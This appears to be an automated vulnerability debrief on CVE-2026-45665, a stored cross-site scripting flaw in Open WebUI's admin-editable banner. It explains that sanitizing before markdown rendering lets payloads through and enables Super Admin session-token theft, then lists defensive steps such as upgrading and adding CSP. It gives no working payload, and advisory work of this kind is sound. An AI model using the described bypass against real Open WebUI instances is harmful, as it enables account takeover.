PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-45665 open-webui CVE debrief

A stored cross-site scripting (XSS) vulnerability in Open WebUI prior to version 0.8.0 allows a compromised administrator to inject malicious JavaScript into the global banner component. The root cause is an improper sanitization order where DOMPurify executes before the marked library processes content, enabling payload bypass. Because the banner renders for all users including the Super Admin, this vector facilitates privilege escalation and session token theft. The CVSS 3.1 score of 8.1 reflects high impact with network attack vector, low attack complexity, high privileges required, and user interaction needed, with scope change and high confidentiality and integrity impacts. The vulnerability was published on May 15, 2026 and last modified on May 19, 2026.

Vendor
open-webui
Product
Unknown
CVSS
HIGH 8.1
CISA KEV
Not listed in stored evidence
Original CVE published
2026-05-15
Original CVE updated
2026-05-19
Advisory published
2026-05-15
Advisory updated
2026-05-19

Who should care

Organizations running self-hosted Open WebUI instances with multiple administrative users, particularly those where administrator accounts may be shared or where insider threats are a concern. Security teams responsible for AI platform infrastructure and identity management administrators should prioritize this patch due to the direct path from compromised admin to full platform control.

Technical summary

The vulnerability exists in the Banner component of Open WebUI where user-controlled content undergoes sanitization by DOMPurify before processing by the marked markdown library. This ordering allows crafted payloads to survive the sanitization process and execute in the context of any user viewing the banner, including the Super Admin. The attack requires administrative privileges to modify the banner but results in complete compromise of the highest-privilege account through session token exfiltration. The fix in version 0.8.0 corrects the sanitization pipeline to prevent payload bypass.

Defensive priority

high

Recommended defensive actions

  • Upgrade Open WebUI to version 0.8.0 or later to remediate the improper sanitization order in the Banner component
  • Review administrator account access controls and audit recent banner configuration changes for indicators of compromise
  • Implement Content Security Policy (CSP) headers as a defense-in-depth measure to mitigate impact of any residual XSS vectors
  • Monitor authentication logs for anomalous Super Admin session activity that may indicate successful exploitation
  • Consider implementing additional approval workflows for banner modifications requiring multiple administrator authorizations

Evidence notes

The vulnerability description and CVSS vector are sourced from the NVD record. The specific technical details regarding DOMPurify and marked library ordering, as well as the Super Admin session token theft vector, are derived from the official GitHub Security Advisory. CPE criteria confirm affected versions are all versions prior to 0.8.0.

Official resources

public